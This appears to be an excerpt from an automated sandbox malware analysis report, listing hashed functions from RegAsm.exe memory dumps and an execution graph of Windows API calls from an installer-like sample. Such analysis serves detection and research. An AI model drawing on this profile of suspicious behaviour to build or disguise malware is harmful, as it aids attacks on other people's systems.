                                                                                                                                                                                  • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                  Function 0533D040 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                                                                                                                                  Function 02CBB1EF Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6d0bc0d5b08a060383d3c2d97c2d43e1f57c68525c56ee13dbcf388f850a22cd
                                                                                                                                                                                  • Instruction ID: af281d72671b706b79a46c07a4ae669c2a840742ee63b83cec1291759ca810dd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d0bc0d5b08a060383d3c2d97c2d43e1f57c68525c56ee13dbcf388f850a22cd
                                                                                                                                                                                  • Instruction Fuzzy Hash: 21B092313291404BC385DB24C8A399ABBA1DB96215728C4A9E9489F20BEA32DC13C714
                                                                                                                                                                                  Function 02CB4CF9 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: fad860071166c26bf8d9387257f5f91bad0b1e55fb97fe1a8ec2029ffecce77f
                                                                                                                                                                                  • Instruction ID: 2d701bf5e64580d3d566d716ea9bec912c6411cf1e960b815b56f1ef2ffe6cc1
                                                                                                                                                                                  • Opcode Fuzzy Hash: fad860071166c26bf8d9387257f5f91bad0b1e55fb97fe1a8ec2029ffecce77f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 10B092B92011405BCB828624D892464BBA29B8A218318C888E986CB256CB23DC03DA00
                                                                                                                                                                                  Function 010156E0 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                                                                                                                                                  • Instruction ID: e80b9cbb32ce7aa80f269217a2acaa4f8c5de131eb2df65f765f3a476441bad2
                                                                                                                                                                                  • Opcode Fuzzy Hash: cdfec89ecf4d227c2e3f2741df1fca2c4e7a0756e2f1ba050c9a008d3bdc9887
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3DB002747054005B8748D65DD951515A7D29BC9215728C4AD641DC7355DE22DD039644
                                                                                                                                                                                  Function 02CB4740 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                  Function 01010890 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 859c8ae9b3a23126b85102071d6acaff4e8b0fd58d1c1e963e9192b5a0dc1e58
                                                                                                                                                                                  • Instruction ID: 396132c7783314c3017a29f0bcaf758c48c13dc43e430e24ecaecc7b9ee1aadb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 859c8ae9b3a23126b85102071d6acaff4e8b0fd58d1c1e963e9192b5a0dc1e58
                                                                                                                                                                                  • Instruction Fuzzy Hash: 24900235044A0CCF454027957A0A955775D95849197840451A50D465115A5574545595
                                                                                                                                                                                  Function 01013EB0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 7c63b20a86d54f9730295614f1cbf4854943a9de8a8953d9cc90e3baf516db48
                                                                                                                                                                                  • Instruction ID: 0c4a003cc2d42e5d99f6cbf4d8596e677ec1f4a579adb69ac5864672bd04bd1c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c63b20a86d54f9730295614f1cbf4854943a9de8a8953d9cc90e3baf516db48
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7390023205570C8B458067A9750E565BB5D9A445157900051B50D519415FA5641045A6
                                                                                                                                                                                  Function 05323F20 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                  Function 05321FE0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                  Function 05324B50 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142494167.0000000005320000.00000040.00000800.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5320000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                  Function 05330CD0 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4142646229.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_5330000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                                                                                                                                  Function 01018E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                                                                                                                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                  Function 02CBAE7A Relevance: 5.3, Strings: 4, Instructions: 253COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4131314938.0000000002CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_2cb0000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: (bq$(bq$(bq$(bq
                                                                                                                                                                                  • API String ID: 0-2632976689
                                                                                                                                                                                  • Opcode ID: 325aabd7d1a3e0517543e4302dd9ed580f92154a18e23c58aeab633ddc8a46ec
                                                                                                                                                                                  • Instruction ID: 2aad028fa9eb85c7dd8991b54a512b3e3eac7a3b4aabf38ff05a978cfb4f36b0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 325aabd7d1a3e0517543e4302dd9ed580f92154a18e23c58aeab633ddc8a46ec
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2191D4317002559FCB16EF29D890AAE37E2EFD9314F548669E8468B399CF34DD06CB90
                                                                                                                                                                                  Function 01013EC0 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000D.00000002.4128592018.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_1010000_RegAsm.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 6=/[$6=/[$Vy27$dv-z
                                                                                                                                                                                  • API String ID: 0-987507756
                                                                                                                                                                                  • Opcode ID: 2b485003a8e3e55314fcae9d8d2899b3858f8af350604c49844e5aa8fbd0700a
                                                                                                                                                                                  • Instruction ID: d38335d675de8131a08eb3dea99018a98da11d178aeb527527660d75668f067c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b485003a8e3e55314fcae9d8d2899b3858f8af350604c49844e5aa8fbd0700a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A39142B0802B448FD359DF0A8589BA1BBE0BF89310F5A86FAC15D8F232E7758445CF95

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:18.6%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:1525
                                                                                                                                                                                  Total number of Limit Nodes:33
                                                                                                                                                                                  execution_graph 4341 402fc0 4342 401446 18 API calls 4341->4342 4343 402fc7 4342->4343 4344 403017 4343->4344 4345 40300a 4343->4345 4348 401a13 4343->4348 4346 406805 18 API calls 4344->4346 4347 401446 18 API calls 4345->4347 4346->4348 4347->4348 4349 4023c1 4350 40145c 18 API calls 4349->4350 4351 4023c8 4350->4351 4354 40726a 4351->4354 4357 406ed2 CreateFileW 4354->4357 4358 406f04 4357->4358 4359 406f1e ReadFile 4357->4359 4360 4062a3 11 API calls 4358->4360 4361 4023d6 4359->4361 4364 406f84 4359->4364 4360->4361 4362 4071e3 CloseHandle 4362->4361 4363 406f9b ReadFile lstrcpynA lstrcmpA 4363->4364 4365 406fe2 SetFilePointer ReadFile 4363->4365 4364->4361 4364->4362 4364->4363 4368 406fdd 4364->4368 4365->4362 4366 4070a8 ReadFile 4365->4366 4367 407138 4366->4367 4367->4366 4367->4368 4369 40715f SetFilePointer GlobalAlloc ReadFile 4367->4369 4368->4362 4370 4071a3 4369->4370 4371 4071bf lstrcpynW GlobalFree 4369->4371 4370->4370 4370->4371 4371->4362 4372 401cc3 4373 40145c 18 API calls 4372->4373 4374 401cca lstrlenW 4373->4374 4375 4030dc 4374->4375 4376 4030e3 4375->4376 4378 405f51 wsprintfW 4375->4378 4378->4376 4393 401c46 4394 40145c 18 API calls 4393->4394 4395 401c4c 4394->4395 4396 4062a3 11 API calls 4395->4396 4397 401c59 4396->4397 4398 406c9b 81 API calls 4397->4398 4399 401c64 4398->4399 4400 403049 4401 401446 18 API calls 4400->4401 4404 403050 4401->4404 4402 406805 18 API calls 4403 401a13 4402->4403 4404->4402 4404->4403 4405 40204a 4406 401446 18 API calls 4405->4406 4407 402051 IsWindow 4406->4407 4408 4018d3 4407->4408 4409 40324c 4410 403277 4409->4410 4411 40325e SetTimer 4409->4411 4412 4032cc 4410->4412 4413 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4413 4411->4410 4413->4412 4414 4048cc 4415 4048f1 4414->4415 4416 4048da 4414->4416 4418 4048ff IsWindowVisible 4415->4418 4422 404916 4415->4422 4417 4048e0 4416->4417 4432 40495a 4416->4432 4419 403daf SendMessageW 4417->4419 4421 40490c 4418->4421 4418->4432 4423 4048ea 4419->4423 4420 404960 CallWindowProcW 4420->4423 4433 40484e SendMessageW 4421->4433 4422->4420 4438 406009 lstrcpynW 4422->4438 4426 404945 4439 405f51 wsprintfW 4426->4439 4428 40494c 4429 40141d 80 API calls 4428->4429 4430 404953 4429->4430 4440 406009 lstrcpynW 4430->4440 4432->4420 4434 404871 GetMessagePos ScreenToClient SendMessageW 4433->4434 4435 4048ab SendMessageW 4433->4435 4436 4048a3 4434->4436 4437 4048a8 4434->4437 4435->4436 4436->4422 4437->4435 4438->4426 4439->4428 4440->4432 4441 4022cc 4442 40145c 18 API calls 4441->4442 4443 4022d3 4442->4443 4444 4062d5 2 API calls 4443->4444 4445 4022d9 4444->4445 4446 4022e8 4445->4446 4450 405f51 wsprintfW 4445->4450 4449 4030e3 4446->4449 4451 405f51 wsprintfW 4446->4451 4450->4446 4451->4449 4221 4050cd 4222 405295 4221->4222 4223 4050ee GetDlgItem GetDlgItem GetDlgItem 4221->4223 4224 4052c6 4222->4224 4225 40529e GetDlgItem CreateThread CloseHandle 4222->4225 4270 403d98 SendMessageW 4223->4270 4227 4052f4 4224->4227 4229 4052e0 ShowWindow ShowWindow 4224->4229 4230 405316 4224->4230 4225->4224 4273 405047 83 API calls 4225->4273 4231 405352 4227->4231 4233 405305 4227->4233 4234 40532b ShowWindow 4227->4234 4228 405162 4241 406805 18 API calls 4228->4241 4272 403d98 SendMessageW 4229->4272 4235 403dca 8 API calls 4230->4235 4231->4230 4236 40535d SendMessageW 4231->4236 4237 403d18 SendMessageW 4233->4237 4239 40534b 4234->4239 4240 40533d 4234->4240 4238 40528e 4235->4238 4236->4238 4243 405376 CreatePopupMenu 4236->4243 4237->4230 4242 403d18 SendMessageW 4239->4242 4244 404f72 25 API calls 4240->4244 4245 405181 4241->4245 4242->4231 4246 406805 18 API calls 4243->4246 4244->4239 4247 4062a3 11 API calls 4245->4247 4249 405386 AppendMenuW 4246->4249 4248 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4247->4248 4250 4051f3 4248->4250 4251 4051d7 SendMessageW SendMessageW 4248->4251 4252 405399 GetWindowRect 4249->4252 4253 4053ac 4249->4253 4254 405206 4250->4254 4255 4051f8 SendMessageW 4250->4255 4251->4250 4256 4053b3 TrackPopupMenu 4252->4256 4253->4256 4257 403d3f 19 API calls 4254->4257 4255->4254 4256->4238 4258 4053d1 4256->4258 4259 405216 4257->4259 4260 4053ed SendMessageW 4258->4260 4261 405253 GetDlgItem SendMessageW 4259->4261 4262 40521f ShowWindow 4259->4262 4260->4260 4263 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4260->4263 4261->4238 4266 405276 SendMessageW SendMessageW 4261->4266 4264 405242 4262->4264 4265 405235 ShowWindow 4262->4265 4267 40542f SendMessageW 4263->4267 4271 403d98 SendMessageW 4264->4271 4265->4264 4266->4238 4267->4267 4268 40545a GlobalUnlock SetClipboardData CloseClipboard 4267->4268 4268->4238 4270->4228 4271->4261 4272->4227 4452 4030cf 4453 40145c 18 API calls 4452->4453 4454 4030d6 4453->4454 4456 4030dc 4454->4456 4459 4063ac GlobalAlloc lstrlenW 4454->4459 4457 4030e3 4456->4457 4486 405f51 wsprintfW 4456->4486 4460 4063e2 4459->4460 4461 406434 4459->4461 4462 40640f GetVersionExW 4460->4462 4487 40602b CharUpperW 4460->4487 4461->4456 4462->4461 4463 40643e 4462->4463 4464 406464 LoadLibraryA 4463->4464 4465 40644d 4463->4465 4464->4461 4468 406482 GetProcAddress GetProcAddress GetProcAddress 4464->4468 4465->4461 4467 406585 GlobalFree 4465->4467 4469 40659b LoadLibraryA 4467->4469 4470 4066dd FreeLibrary 4467->4470 4473 4064aa 4468->4473 4476 4065f5 4468->4476 4469->4461 4472 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4469->4472 4470->4461 4471 406651 FreeLibrary 4480 40662a 4471->4480 4472->4476 4474 4064ce FreeLibrary GlobalFree 4473->4474 4473->4476 4482 4064ea 4473->4482 4474->4461 4475 4066ea 4478 4066ef CloseHandle FreeLibrary 4475->4478 4476->4471 4476->4480 4477 4064fc lstrcpyW OpenProcess 4479 40654f CloseHandle CharUpperW lstrcmpW 4477->4479 4477->4482 4481 406704 CloseHandle 4478->4481 4479->4476 4479->4482 4480->4475 4483 406685 lstrcmpW 4480->4483 4484 4066b6 CloseHandle 4480->4484 4485 4066d4 CloseHandle 4480->4485 4481->4478 4482->4467 4482->4477 4482->4479 4483->4480 4483->4481 4484->4480 4485->4470 4486->4457 4487->4460 4488 407752 4492 407344 4488->4492 4489 407c6d 4490 4073c2 GlobalFree 4491 4073cb GlobalAlloc 4490->4491 4491->4489 4491->4492 4492->4489 4492->4490 4492->4491 4492->4492 4493 407443 GlobalAlloc 4492->4493 4494 40743a GlobalFree 4492->4494 4493->4489 4493->4492 4494->4493 4495 401dd3 4496 401446 18 API calls 4495->4496 4497 401dda 4496->4497 4498 401446 18 API calls 4497->4498 4499 4018d3 4498->4499 4507 402e55 4508 40145c 18 API calls 4507->4508 4509 402e63 4508->4509 4510 402e79 4509->4510 4511 40145c 18 API calls 4509->4511 4512 405e30 2 API calls 4510->4512 4511->4510 4513 402e7f 4512->4513 4537 405e50 GetFileAttributesW CreateFileW 4513->4537 4515 402e8c 4516 402f35 4515->4516 4517 402e98 GlobalAlloc 4515->4517 4520 4062a3 11 API calls 4516->4520 4518 402eb1 4517->4518 4519 402f2c CloseHandle 4517->4519 4538 403368 SetFilePointer 4518->4538 4519->4516 4522 402f45 4520->4522 4524 402f50 DeleteFileW 4522->4524 4525 402f63 4522->4525 4523 402eb7 4527 403336 ReadFile 4523->4527 4524->4525 4539 401435 4525->4539 4528 402ec0 GlobalAlloc 4527->4528 4529 402ed0 4528->4529 4530 402f04 WriteFile GlobalFree 4528->4530 4531 40337f 37 API calls 4529->4531 4532 40337f 37 API calls 4530->4532 4536 402edd 4531->4536 4533 402f29 4532->4533 4533->4519 4535 402efb GlobalFree 4535->4530 4536->4535 4537->4515 4538->4523 4540 404f72 25 API calls 4539->4540 4541 401443 4540->4541 4542 401cd5 4543 401446 18 API calls 4542->4543 4544 401cdd 4543->4544 4545 401446 18 API calls 4544->4545 4546 401ce8 4545->4546 4547 40145c 18 API calls 4546->4547 4548 401cf1 4547->4548 4549 401d07 lstrlenW 4548->4549 4550 401d43 4548->4550 4551 401d11 4549->4551 4551->4550 4555 406009 lstrcpynW 4551->4555 4553 401d2c 4553->4550 4554 401d39 lstrlenW 4553->4554 4554->4550 4555->4553 4556 403cd6 4557 403ce1 4556->4557 4558 403ce5 4557->4558 4559 403ce8 GlobalAlloc 4557->4559 4559->4558 4560 402cd7 4561 401446 18 API calls 4560->4561 4564 402c64 4561->4564 4562 402d99 4563 402d17 ReadFile 4563->4564 4564->4560 4564->4562 4564->4563 4565 402dd8 4566 402ddf 4565->4566 4567 4030e3 4565->4567 4568 402de5 FindClose 4566->4568 4568->4567 4569 401d5c 4570 40145c 18 API calls 4569->4570 4571 401d63 4570->4571 4572 40145c 18 API calls 4571->4572 4573 401d6c 4572->4573 4574 401d73 lstrcmpiW 4573->4574 4575 401d86 lstrcmpW 4573->4575 4576 401d79 4574->4576 4575->4576 4577 401c99 4575->4577 4576->4575 4576->4577 4279 407c5f 4280 407344 4279->4280 4281 4073c2 GlobalFree 4280->4281 4282 4073cb GlobalAlloc 4280->4282 4283 407c6d 4280->4283 4284 407443 GlobalAlloc 4280->4284 4285 40743a GlobalFree 4280->4285 4281->4282 4282->4280 4282->4283 4284->4280 4284->4283 4285->4284 4578 404363 4579 404373 4578->4579 4580 40439c 4578->4580 4582 403d3f 19 API calls 4579->4582 4581 403dca 8 API calls 4580->4581 4583 4043a8 4581->4583 4584 404380 SetDlgItemTextW 4582->4584 4584->4580 4585 4027e3 4586 4027e9 4585->4586 4587 4027f2 4586->4587 4588 402836 4586->4588 4601 401553 4587->4601 4589 40145c 18 API calls 4588->4589 4591 40283d 4589->4591 4593 4062a3 11 API calls 4591->4593 4592 4027f9 4594 40145c 18 API calls 4592->4594 4599 401a13 4592->4599 4595 40284d 4593->4595 4596 40280a RegDeleteValueW 4594->4596 4605 40149d RegOpenKeyExW 4595->4605 4597 4062a3 11 API calls 4596->4597 4600 40282a RegCloseKey 4597->4600 4600->4599 4602 401563 4601->4602 4603 40145c 18 API calls 4602->4603 4604 401589 RegOpenKeyExW 4603->4604 4604->4592 4611 401515 4605->4611 4613 4014c9 4605->4613 4606 4014ef RegEnumKeyW 4607 401501 RegCloseKey 4606->4607 4606->4613 4608 4062fc 3 API calls 4607->4608 4610 401511 4608->4610 4609 401526 RegCloseKey 4609->4611 4610->4611 4614 401541 RegDeleteKeyW 4610->4614 4611->4599 4612 40149d 3 API calls 4612->4613 4613->4606 4613->4607 4613->4609 4613->4612 4614->4611 4615 403f64 4616 403f90 4615->4616 4617 403f74 4615->4617 4619 403fc3 4616->4619 4620 403f96 SHGetPathFromIDListW 4616->4620 4626 405c84 GetDlgItemTextW 4617->4626 4622 403fad SendMessageW 4620->4622 4623 403fa6 4620->4623 4621 403f81 SendMessageW 4621->4616 4622->4619 4624 40141d 80 API calls 4623->4624 4624->4622 4626->4621 4627 402ae4 4628 402aeb 4627->4628 4629 4030e3 4627->4629 4630 402af2 CloseHandle 4628->4630 4630->4629 4631 402065 4632 401446 18 API calls 4631->4632 4633 40206d 4632->4633 4634 401446 18 API calls 4633->4634 4635 402076 GetDlgItem 4634->4635 4636 4030dc 4635->4636 4637 4030e3 4636->4637 4639 405f51 wsprintfW 4636->4639 4639->4637 4640 402665 4641 40145c 18 API calls 4640->4641 4642 40266b 4641->4642 4643 40145c 18 API calls 4642->4643 4644 402674 4643->4644 4645 40145c 18 API calls 4644->4645 4646 40267d 4645->4646 4647 4062a3 11 API calls 4646->4647 4648 40268c 4647->4648 4649 4062d5 2 API calls 4648->4649 4650 402695 4649->4650 4651 4026a6 lstrlenW lstrlenW 4650->4651 4652 404f72 25 API calls 4650->4652 4655 4030e3 4650->4655 4653 404f72 25 API calls 4651->4653 4652->4650 4654 4026e8 SHFileOperationW 4653->4654 4654->4650 4654->4655 4663 401c69 4664 40145c 18 API calls 4663->4664 4665 401c70 4664->4665 4666 4062a3 11 API calls 4665->4666 4667 401c80 4666->4667 4668 405ca0 MessageBoxIndirectW 4667->4668 4669 401a13 4668->4669 4677 402f6e 4678 402f72 4677->4678 4679 402fae 4677->4679 4680 4062a3 11 API calls 4678->4680 4681 40145c 18 API calls 4679->4681 4682 402f7d 4680->4682 4687 402f9d 4681->4687 4683 4062a3 11 API calls 4682->4683 4684 402f90 4683->4684 4685 402fa2 